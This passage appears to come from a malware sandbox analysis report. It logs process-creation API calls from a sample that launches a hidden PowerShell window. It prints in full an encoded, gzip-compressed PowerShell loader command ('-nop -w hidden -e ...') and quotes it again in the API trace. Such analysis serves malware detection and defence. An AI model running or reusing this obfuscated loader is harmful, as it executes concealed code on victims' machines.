CM0wB33B1CFg+a7u6mfsVHth9ZhjHOesiC66233asvuB0hvOkY9Q{1}vT8Y'+'daky4hRc9frIw'+'wtbQGLPGoo16W4uS24fz7u0Ndvt3g0Zo1Kc3qNMaTyVO4wZt{1}ozu4cjxDbZH6eWRbdTHBObjbDSxpW2EF1eTMdhq+MvQOJ10jpB11J+mDbyyeO5N9{2}YBXSy{1}6+6Qwf7ousHRmA1uMOrf7roG{1}DdsIbtlI99db+Ob9ebj40bg3gQvrJ'+'Fxev35A8R7dk1j0WzMK9H2diyL4vt3FWatHg7C{2}lrRd3GSLjEDOkA1L7Oyy5NuUZ+H{1}EoNTZONfkWSmDBojdA8Sy4jxrgv20N'+'eyKE17RuG7F{2}XTu7VSzNd'+'eRLU{1}9tGuXR2dgtOQ{1}4AdWt9Ei{2}Esmpum6YJ1d7cmq08D95+szZf7zRpqyrbRY5MYZvltsEcDRVN++'+'VYwatAQHV6Ha3XgIOjV1BMoLrtU1zCZ3HODsEr7vXEhQPsALQ63HwmHwQ5R8DAMXlQKkJ2y8PuW2H357+UNUWhWsJf8G+seV77h903Mcms7tH5af{1}HhYMa{2}+sQmGAqQNCDisvI{'+'2}hHwMhBFphxG+P4c8iAsh{1}wbX2bieABvrbzm{2}wXRA8aElQsAAA{0}{0}')-f'=','n','/')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
cmdline	powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASQBzAHkAMQAyAFUAQwBBADcAVgBXAGIAVwB7ADIAfQBpAE8AQgBEACsAdgB0AEwAKwBoADIAaQBGAGwARQBTACcAJwArACcAJwBsAEoATAB5AG8AdQA2ADIAMAAwAGoAbABRAG0AaQBCAEMAMgBZAFoAQwBLAFkAdABPAGIAdQBLAEEAaQB4AFAAVAB4AEMAbAB3AGUAewAyAH0AdgBmAGIAeAB5AFMAbAByADEAdAA3ADMAbwB7ADEAfQByAFMAVwBFAFkAOAArAE0AeAA4ADgAOABNACsATQB3AGkAMwAxAEIAZQBhAHkAcwB2AGkARABsADIAewAyAH0AdAAzAFMAagBHAEcATwBNAEcAUgBvAGwAWAA0AFEAMQBwAFYASwB7ADEAfQB4AFoANwA1ADMAcQB6ADcAdQBWAE0ASwBoAHsAMgB9AFYARAA0AHIAMgBnAHkAdAAxAHgAMABlAFkAUgByACcAJwArACcAJwBQAHoAOAA3AGEAVwBaAEsAUQBXAE8AeQB7ADIAfQBhAHgAZABFAG8ARABRAGwAMAAnACcAKwAnACcAUgAyAGoASgBOAFYAMAA1AFUAOQBsAHMAaQBRAEoATwBiADYAOAB1AHkAZQArACcAJwArACcAJwBVAEwANABwAGwAZAA5AHIARgA0AHoAZgBZAFYAYQBJADcAZAByAFkAWAB4AEwAbABHAE0AVwBCADMATwB0AHoASAAwAHYAUABhAHQANgBhAFUAYQBHAHAAWAA3ACsAcQArAHUAeQA0AFAAcQArAGQAUAAyAFMAWQBwAFoAcgBxADcAVgBKAEIAbwBsAHIAQQBtAEsAbwByADMAMwBWADUANABHAGkAMwBKAHAAcgBxAFUAagB7ADIAfQBoAEsAUQA5AEYAYgBVAEwAagBaAHEATgAyAEgAYQBjADQASgBBAE8AdwA5AGsAaABjAEkAcABZADgAUwBGAFcANAB6AFAATgAxAEUAaQBLAHkASgBOADcAZgBTAHAAcgBaAEMAMgBrAHEAVABJAGMASgA5ADEARQBRAEoAQwBSAE4AMQBhAG8AeQBrAHcAZgBNADUAdgBQAGYAdABGAGwAeAArAGwAVQBXAEMAeABxAFIAbQBoAE0ATABrAHYAQwAxAFIANQBKAEgANgBwAE8AMABaAHUATQA0AFkATwBTAEsAaABIAFAAUQA4ACcAJwArACcAJwBrAFIAQwA0ADgAVgBjADEAMABIAHMAawBhACsAJwAnACsAJwAnAEkAVgBvAGsAegB4AHEAcgBLAGYAegBHAGoARABjAGkAbQB4AE8ANgB0AFMAdABxAGgARQBrAGcATgBSAGEASgBYAEkAYQBnAHYAMwBOAFAAbABRAGMAYgBJAFgAbABOADkAdwBWAEYASgBCAEIAMwBHAEUAeABrAEEAdwBPADgAUwB3ADcAQQBrAEUASABVADYARgB5ADgAdwA2AEgAbQBoAEgAJwAnACsAJwAnAEwATgA4AGgANABEAFAAMgBwAEMAewAxAH0ATgBGACcAJwArACcAJwBmACsAcgBKAGgAVgB4AFkAWABUAHMAZQBEAEoARABqADQAcgBvAHkAUQBqACsAdgB3AEoAYwBhAFcAUwByAHUAdgBkADYAJwAnACsAJwAnAGwAdQB0ADEAVQB0AFYAVQBHAFEATQBGAG0AWgBqAFQAbwBQADUAcwB7ADIAfQBvAFAAOABhADgAOABiAGkAOABkAEsAZgBRADYAbQB6AHMAawBwAEQASABwADcARwBJAGMAVQBiADgAawByAFAAWgBTAFUARQBqAEkAUwBJADUASQByAFIAUQBiAGcASAArAGEAVwBtAHkAUQBvAEUATQAnACcAKwAnACcAWQBXAFcAQQBoAFkAWgBiAGMAKwBFAHsAMQB9AHQAUABLAEwAaQBTAGQAZgBLAEsAQQB0AEkAZwB7ADEAfQB3AEkAYgBBAHAAZQBRAGMAegAxAEgANQAzAFoAUgAwADUAVAB7ADEAfQBkAGcAbABFAFkAQwAzAHsAMgB9AHcAYQB5AFYAawBKAEkARQAxAEoASwBGADYAbQB4AEsAMAArAFgAMwB5AEMAawB0AGgAbABPAEkAYwBXAEgARwBlAFMAcABYADEAVQA4AGcAaABrAEoAcQBnAHEAJwAnACsAJwAnAEsAVQAxAHAAcwBvAFUAegB3AGYASwBvACsAdQArAHQAbQBUAEYAJwAnACsAJwAnAEEAZgBwADYASQAwAE4AOQBmAHsAMgB9AEIAbQBkAHgAYgBKAHYASABxAFUAZwB5AEgAOABJAEsARQBJAHkAOABOAGYARQBwAFoAaABLAFIAcQBtAEwAVABnAEYAZwA3AGoAeQA3AEsANAA5AFUAWAA4AFcAaABqAHgAaQBCADkAdwBOAEkAagB4AEEATgBXAEoAQQA2AGUAawBHAFIASgB3AE4ATwBjAEcASAByAE4ASQA4AEsASgAxAG8AeABFAEkASgBQAFgAagBTADcARABDADYAZwBTAFIAWgBMAGsANwBNAEkATABFAHEAaQB2AE8ARgByAG0AdwBwADcANABFAHAAawBTAGsAZwBNADMASQBkAHcAZQA0ADYASwBxAGoARwBrAGkAbwBBAHAASgBsAEcAVgArAHsAMgB9AEEAOABmAGYAcQA0ACsAdQBUAFAAdABoAEIAVABCADAAYwBvAE0AbQAxAGsANwBJAFYATwBnAGcAdQAyADYASgBHAG0AQgBVAEkANQBIAEkAZwBDAEwAYgBzAEkAagBDADYAZgBrAHAATABVAHYATgBOAG8ASAA0ADUASQBPAEUAWQB5AHAARQB6AE0AMwA2AEsAMQBvADMAZAB7ADEAfQBBAHoANABYAGYAdABSAHMAZQA5AFgAMgA2AEcAQQBxAFQAUgA2ADcAZgBUAG8AYwBYADMAVQArAEkAYgBoAFkAYgB7ADIAfQA5AE0AQQArAFUARQB2AEkASwBmAGUAdQBDAFcAOABjADAAZQAwAGgAOABqACsAUQBrADIAcgB0AGYAUQB0AGMAdwBUAHoAYQAwAGMANABGADQANgBZAE8AcwBnAGUATABYADEAbQBEAGoAdQAyADQAVQAxAFQAawAyADcAcwBpAGUAdAAzAHIARAA4ADIAagBSAFMAbwAyAG0AcgBaAE4AeQBaAHEATgBsAHUAWABUAFgATQBGADQARQAxAHAAZgBiAEYAQwB3AFMAQwBpAG0AMgAwAGYANQBsAEIAUgBMAHsAMgB9AHUAVwBrADEAcQBtAHcAOAA1ADcANwBhAHUANwBTAGEATgA3AE8AMgBHADIAMABlAG8AdQB3AHcAbABQAHYAWgBOAHAAeAB6AEMATQAwAHcAQgAzADMAQgAxAEMARgBnACsAYQA3AHUANgBtAGYAcwBWAEgAdABoADkAWgBoAGoASABPAGUAcwBpAEMANgA2ADIAMwAzAGEAcwB2AHUAQgAwAGgAdgBPAGsAWQA5AFEAewAxAH0AdgBUADgAWQAnACcAKwAnACcAZABhAGsAeQA0AGgAUgBjADkAZgByAEkAdwAnACcAKwAnACcAdwB0AGIAUQBHAEwAUABHAG8AbwAxADYAVwA0AHUAUwAyADQAZgB6ADcAdQAwAE4AZAB2AHQAMwBnADAAWgBvADEASwBjADMAcQBOAE0AYQBUAHkAVgBPADQAdwBaAHQAewAxAH0AbwB6AHUANABjAGoAeABEAGIAWgBIADYAZQBXAFIAYgBkAFQASABCAE8AYgBqAGIARABTAHgAcABXADIARQBGADEAZQBUAE0AZABoAHEAKwBNAHYAUQBPAEoAMQAwAGoAcABCADEAMQBKACsAbQBEAGIAeQB5AGUATwA1AE4AOQB7ADIAfQBZAEIAWABTAHkAewAxAH0ANgArADYAUQB3AGYANwBvAHUAcwBIAFIAbQBBADEAdQBNAE8AcgBmADcAcgBvAEcAewAxAH0ARABkAHMASQBiAHQAbABJADkAOQBkAGIAKwBPAGIAOQBlAGIAagA0ADAAYgBnADMAZwBRAHYAcgBKACcAJwArACcAJwBGAHgAZQB2ADMANQBBADgAUgA3AGQAawAxAGoAMABXAHoATQBLADkASAAyAGQAaQB5AEwANAB2AHQAMwBGAFcAYQB0AEgAZwA3AEMAewAyAH0AbAByAFIAZAAzAEcAUwBMAGoARQBEAE8AawBBADEATAA3AE8AeQB5ADUATgB1AFUAWgArAEgAewAxAH0ARQBvAE4AVABaAE8ATgBmAGsAVwBTAG0ARABCAG8AagBkAEEAOABTAHkANABqAHgAcgBnAHYAMgAwAE4AJwAnACsAJwAnAGUAeQBLAEUAMQA3AFIAdQBHADcARgB7ADIAfQBYAFQAdQA3AFYAUwB6AE4AZAAnACcAKwAnACcAZQBSAEwAVQB7ADEAfQA5AHQARwB1AFgAUgAyAGQAZwB0AE8AUQB7ADEAfQA0AEEAZABXAHQAOQBFAGkAewAyAH0ARQBzAG0AcAB1AG0ANgBZAEoAMQBkADcAYwBtAHEAMAA4AEQAOQA1ACsAcwB6AFoAZgA3AHoAUgBwAHEAeQByAGIAUgBZADUATQBZAFoAdgBsAHQAcwBFAGMARABSAFYATgArACsAJwAnACsAJwAnAFYAWQB3AGEAdABBAFEASABWADYASABhADMAWABnAEkATwBqAFYAMQBCAE0AbwBMAHIAdABVADEAegBDAFoAMwBIAE8ARABzAEUAcgA3AHYAWABFAGgAUQBQAHMAQQBMAFEANgAzAEgAdwBtAEgAdwBRADUAUgA4AEQAQQBNAFgAbABRAEsAawBKADIAeQA4AFAAdQBXADIASAAzADUANwArAFUATgBVAFcAaABXAHMASgBmADgARwArAHMAZQBWADcANwBoADkAMAAzAE0AYwBtAHMANwB0AEgANQBhAGYAewAxAH0ASABoAFkATQBhAHsAMgB9ACsAcwBRAG0ARwBBAHEAUQBOAEMARABpAHMAdgBJAHsAJwAnACsAJwAnADIAfQBoAEgAdwBNAGgAQgBGAHAAaAB4AEcAKwBQADQAYwA4AGkAQQBzAGgAewAxAH0AdwBiAFgAMgBiAGkAZQBBAEIAdgByAGIAegBtAHsAMgB9AHcAWABSAEEAOABhAEUAbABRAHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBuACcAJwAsACcAJwAvACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 31, 2024, 10:02 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASQBzAHkAMQAyAFUAQwBBADcAVgBXAGIAVwB7ADIAfQBpAE8AQgBEACsAdgB0AEwAKwBoADIAaQBGAGwARQBTACcAJwArACcAJwBsAEoATAB5AG8AdQA2ADIAMAAwAGoAbABRAG0AaQBCAEMAMgBZAFoAQwBLAFkAdABPAGIAdQBLAEEAaQB4AFAAVAB4AEMAbAB3AGUAewAyAH0AdgBmAGIAeAB5AFMAbAByADEAdAA3ADMAbwB7ADEAfQByAFMAVwBFAFkAOAArAE0AeAA4ADgAOABNACsATQB3AGkAMwAxAEIAZQBhAHkAcwB2AGkARABsADIAewAyAH0AdAAzAFMAagBHAEcATwBNAEcAUgBvAGwAWAA0AFEAMQBwAFYASwB7ADEAfQB4AFoANwA1ADMAcQB6ADcAdQBWAE0ASwBoAHsAMgB9AFYARAA0AHIAMgBnAHkAdAAxAHgAMABlAFkAUgByACcAJwArACcAJwBQAHoAOAA3AGEAVwBaAEsAUQBXAE8AeQB7ADIAfQBhAHgAZABFAG8ARABRAGwAMAAnACcAKwAnACcAUgAyAGoASgBOAFYAMAA1AFUAOQBsAHMAaQBRAEoATwBiADYAOAB1AHkAZQArACcAJwArACcAJwBVAEwANABwAGwAZAA5AHIARgA0AHoAZgBZAFYAYQBJADcAZAByAFkAWAB4AEwAbABHAE0AVwBCADMATwB0AHoASAAwAHYAUABhAHQANgBhAFUAYQBHAHAAWAA3ACsAcQArAHUAeQA0AFAAcQArAGQAUAAyAFMAWQBwAFoAcgBxADcAVgBKAEIAbwBsAHIAQQBtAEsAbwByADMAMwBWADUANABHAGkAMwBKAHAAcgBxAFUAagB7ADIAfQBoAEsAUQA5AEYAYgBVAEwAagBaAHEATgAyAEgAYQBjADQASgBBAE8AdwA5AGsAaABjAEkAcABZADgAUwBGAFcANAB6AFAATgAxAEUAaQBLAHkASgBOADcAZgBTAHAAcgBaAEMAMgBrAHEAVABJAGMASgA5ADEARQBRAEoAQwBSAE4AMQBhAG8AeQBrAHcAZgBNADUAdgBQAGYAdABGAGwAeAArAGwAVQBXAEMAeABxAFIAbQBoAE0ATABrAHYAQwAxAFIANQBKAEgANgBwAE8AMABaAHUATQA0AFkATwBTAEsAaABIAFAAUQA4ACcAJwArACcAJwBrAFIAQwA0ADgAVgBjADEAMABIAHMAawBhACsAJwAnACsAJwAnAEkAVgBvAGsAegB4AHEAcgBLAGYAegBHAGoARABjAGkAbQB4AE8ANgB0AFMAdABxAGgARQBrAGcATgBSAGEASgBYAEkAYQBnAHYAMwBOAFAAbABRAGMAYgBJAFgAbABOADkAdwBWAEYASgBCAEIAMwBHAEUAeABrAEEAdwBPADgAUwB3ADcAQQBrAEUASABVADYARgB5ADgAdwA2AEgAbQBoAEgAJwAnACsAJwAnAEwATgA4AGgANABEAFAAMgBwAEMAewAxAH0ATgBGACcAJwArACcAJwBmACsAcgBKAGgAVgB4AFkAWABUAHMAZQBEAEoARABqADQAcgBvAHkAUQBqACsAdgB3AEoAYwBhAFcAUwByAHUAdgBkADYAJwAnACsAJwAnAGwAdQB0ADEAVQB0AFYAVQBHAFEATQBGAG0AWgBqAFQAbwBQADUAcwB7ADIAfQBvAFAAOABhADgAOABiAGkAOABkAEsAZgBRADYAbQB6AHMAawBwAEQASABwADcARwBJAGMAVQBiADgAawByAFAAWgBTAFUARQBqAEkAUwBJADUASQByAFIAUQBiAGcASAArAGEAVwBtAHkAUQBvAEUATQAnACcAKwAnACcAWQBXAFcAQQBoAFkAWgBiAGMAKwBFAHsAMQB9AHQAUABLAEwAaQBTAGQAZgBLAEsAQQB0AEkAZwB7ADEAfQB3AEkAYgBBAHAAZQBRAGMAegAxAEgANQAzAFoAUgAwADUAVAB7ADEAfQBkAGcAbABFAFkAQwAzAHsAMgB9AHcAYQB5AFYAawBKAEkARQAxAEoASwBGADYAbQB4AEsAMAArAFgAMwB5AEMAawB0AGgAbABPAEkAYwBXAEgARwBlAFMAcABYADEAVQA4AGcAaABrAEoAcQBnAHEAJwAnACsAJwAnAEsAVQAxAHAAcwBvAFUAegB3AGYASwBvACsAdQArAHQAbQBUAEYAJwAnACsAJwAnAEEAZgBwADYASQAwAE4AOQBmAHsAMgB9AEIAbQBkAHgAYgBKAHYASABxAFUAZwB5AEgAOABJAEsARQBJAHkAOABOAGYARQBwAFoAaABLAFIAcQBtAEwAVABnAEYAZwA3AGoAeQA3AEsANAA5AFUAWAA4AFcAaABqAHgAaQBCADkAdwBOAEkAagB4AEEATgBXAEoAQQA2AGUAawBHAFIASgB3AE4ATwBjAEcASAByAE4ASQA4AEsASgAxAG8AeABFAEkASgBQAFgAagBTADcARABDADYAZwBTAFIAWgBMAGsANwBNAEkATABFAHEAaQB2AE8ARgByAG0AdwBwADcANABFAHAAawBTAGsAZwBNADMASQBkAHcAZQA0ADYASwBxAGoARwBrAGkAbwBBAHAASgBsAEcAVgArAHsAMgB9AEEAOABmAGYAcQA0ACsAdQBUAFAAdABoAEIAVABCADAAYwBvAE0AbQAxAGsANwBJAFYATwBnAGcAdQAyADYASgBHAG0AQgBVAEkANQBIAEkAZwBDAEwAYgBzAEkAagBDADYAZgBrAHAATABVAHYATgBOAG8ASAA0ADUASQBPAEUAWQB5AHAARQB6AE0AMwA2AEsAMQBvADMAZAB7ADEAfQBBAHoANABYAGYAdABSAHMAZQA5AFgAMgA2AEcAQQBxAFQAUgA2ADcAZgBUAG8AYwBYADMAVQArAEkAYgBoAFkAYgB7ADIAfQA5AE0AQQArAFUARQB2AEkASwBmAGUAdQBDAFcAOABjADAAZQAwAGgAOABqACsAUQBrADIAcgB0AGYAUQB0AGMAdwBUAHoAYQAwAGMANABGADQANgBZAE8AcwBnAGUATABYADEAbQBEAGoAdQAyADQAVQAxAFQAawAyADcAcwBpAGUAdAAzAHIARAA4ADIAagBSAFMAbwAyAG0AcgBaAE4AeQBaAHEATgBsAHUAWABUAFgATQBGADQARQAxAHAAZgBiAEYAQwB3AFMAQwBpAG0AMgAwAGYANQBsAEIAUgBMAHsAMgB9AHUAVwBrADEAcQBtAHcAOAA1ADcANwBhAHUANwBTAGEATgA3AE8AMgBHADIAMABlAG8AdQB3AHcAbABQAHYAWgBOAHAAeAB6AEMATQAwAHcAQgAzADMAQgAxAEMARgBnACsAYQA3AHUANgBtAGYAcwBWAEgAdABoADkAWgBoAGoASABPAGUAcwBpAEMANgA2ADIAMwAzAGEAcwB2AHUAQgAwAGgAdgBPAGsAWQA5AFEAewAxAH0AdgBUADgAWQAnACcAKwAnACcAZABhAGsAeQA0AGgAUgBjADkAZgByAEkAdwAnACcAKwAnACcAdwB0AGIAUQBHAEwAUABHAG8AbwAxADYAVwA0AHUAUwAyADQAZgB6ADcAdQAwAE4AZAB2AHQAMwBnADAAWgBvADEASwBjADMAcQBOAE0AYQBUAHkAVgBPADQAdwBaAHQAewAxAH0AbwB6AHUANABjAGoAeABEAGIAWgBIADYAZQBXAFIAYgBkAFQASABCAE8AYgBqAGIARABTAHgAcABXADIARQBGADEAZQBUAE0AZABoAHEAKwBNAHYAUQBPAEoAMQAwAGoAcABCADEAMQBKACsAbQBEAGIAeQB5AGUATwA1AE4AOQB7ADIAfQBZAEIAWABTAHkAewAxAH0ANgArADYAUQB3AGYANwBvAHUAcwBIAFIAbQBBADEAdQBNAE8AcgBmADcAcgBvAEcAewAxAH0ARABkAHMASQBiAHQAbABJADkAOQBkAGIAKwBPAGIAOQBlAGIAagA0ADAAYgBnADMAZwBRAHYAcgBKACcAJwArACcAJwBGAHgAZQB2ADMANQBBADgAUgA3AGQAawAxAGoAMABXAHoATQBLADkASAAyAGQAaQB5AEwANAB2AHQAMwBGAFcAYQB0AEgAZwA3AEMAewAyAH0AbAByAFIAZAAzAEcAUwBMAGoARQBEAE8AawBBADEATAA3AE8AeQB5ADUATgB1AFUAWgArAEgAewAxAH0ARQBvAE4AVABaAE8ATgBmAGsAVwBTAG0ARABCAG8AagBkAEEAOABTAHkANABqAHgAcgBnAHYAMgAwAE4AJwAnACsAJwAnAGUAeQBLAEUAMQA3AFIAdQBHADcARgB7ADIAfQBYAFQAdQA3AFYAUwB6AE4AZAAnACcAKwAnACcAZQBSAEwAVQB7ADEAfQA5AHQARwB1AFgAUgAyAGQAZwB0AE8AUQB7ADEAfQA0AEEAZABXAHQAOQBFAGkAewAyAH0ARQBzAG0AcAB1AG0ANgBZAEoAMQBkADcAYwBtAHEAMAA4AEQAOQA1ACsAcwB6AFoAZgA3AHoAUgBwAHEAeQByAGIAUgBZADUATQBZAFoAdgBsAHQAcwBFAGMARABSAFYATgArACsAJwAnACsAJwAnAFYAWQB3AGEAdABBAFEASABWADYASABhADMAWABnAEkATwBqAFYAMQBCAE0AbwBMAHIAdABVADEAegBDAFoAMwBIAE8ARABzAEUAcgA3AHYAWABFAGgAUQBQAHMAQQBMAFEANgAzAEgAdwBtAEgAdwBRADUAUgA4AEQAQQBNAFgAbABRAEsAawBKADIAeQA4AFAAdQBXADIASAAzADUANwArAFUATgBVAFcAaABXAHMASgBmADgARwArAHMAZQBWADcANwBoADkAMAAzAE0AYwBtAHMANwB0AEgANQBhAGYAewAxAH0ASABoAFkATQBhAHsAMgB9ACsAcwBRAG0ARwBBAHEAUQBOAEMARABpAHMAdgBJAHsAJwAnACsAJwAnADIAfQBoAEgAdwBNAGgAQgBGAHAAaAB4AEcAKwBQADQAYwA4AGkAQQBzAGgAewAxAH0AdwBiAFgAMgBiAGkAZQBBAEIAdgByAGIAegBtAHsAMgB9AHcAWABSAEEAOABhAEUAbABRAHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBuACcAJwAsACcAJwAvACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA filepath: powershell.exe	1	1	0
CreateProcessInternalW May 31, 2024, 10:02 a.m.	thread_identifier: 2812 thread_handle: 0x0000044c process_identifier: 2808 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAIsy12UCA7VWbW{2}iOBD+vtL+h2iFlES'+'lJLyou6200jlQmiBC2YZCKYtObuKAixPTxClwe{2}vfbxySlr1t73o{1}rSWEY8+Mx888M+Mwi31BeaysviDl2{2}t3SjGGOMGRolX4Q1pVK{1}xZ753qz7uVMKh{2}VD4r2gyt1x0eYRr'+'Pz87aWZKQWOy{2}axdEoDQl0'+'R2jJNV05U9lsiQJOb68uye+'+'UL4pld9rF4zfYVaI7drYXxLlGMWB3OtzH0vPat6aUaGpX7+q+uy4Pq+dP2SYpZrq7VJBolrAmKor33V54Gi3JprqUj{2}hKQ9FbULjZqN2Hac4JAOw9khcIpY8SFW4zPN1EiKyJN7fSprZC2kqTIcJ91EQJCRN1aoykwfM5vPftFlx+lUWCxqRmhMLkvC1R5JH6pO0ZuM4YOSKhHPQ8'+'kRC48Vc10Hska+'+'IVokzxqrKfzGjDcimxO6tStqhEkgNRaJXIagv3NPlQcbIXlN9wVFJBB3GExkAwO8Sw7AkEHU6Fy8w6HmhH'+'LN8h4DP2pC{1}NF'+'f+rJhVxYXTseDJDj4royQj+vwJcaWSruvd6'+'lut1UtVUGQMFmZjToP5s{2}oP8a88bi8dKfQ6mzskpDHp7GIcUb8krPZSUEjISI5IrRQbgH+aWmyQoEM'+'YWWAhYZbc+E{1}tPKLiSdfKKAtIg{1}wIbApeQcz1H53ZR05T{1}dglEYC3{2}wayVkJIE1JKF6mxK0+X3yCkthlOIcWHGeSpX1U8ghkJqgq'+'KU1psoUzwfKo+u+tmTF'+'Afp6I0N9f{2}BmdxbJvHqUgyH8IKEIy8NfEpZhKRqmLTgFg7jy7K49UX8WhjxiB9wNIjxANWJA6ekGRJwNOcGHrNI8KJ1oxEIJPXjS7DC6gSRZLk7MILEqivOFrmwp74EpkSkgM3Idwe46KqjGkioApJlGV+{2}A8ffq4+uTPthBTB0coMm1k7IVOggu26JGmBUI5HIgCLbsIjC6fkpLUvNNoH45IOEYypEzM36K1o3d{1}Az4XftRse9X26GAqTR67fTocX3U+IbhYb{2}9MA+UEvIKfeuCW8c0e0h8j+Qk2rtfQtcwTza0c4F46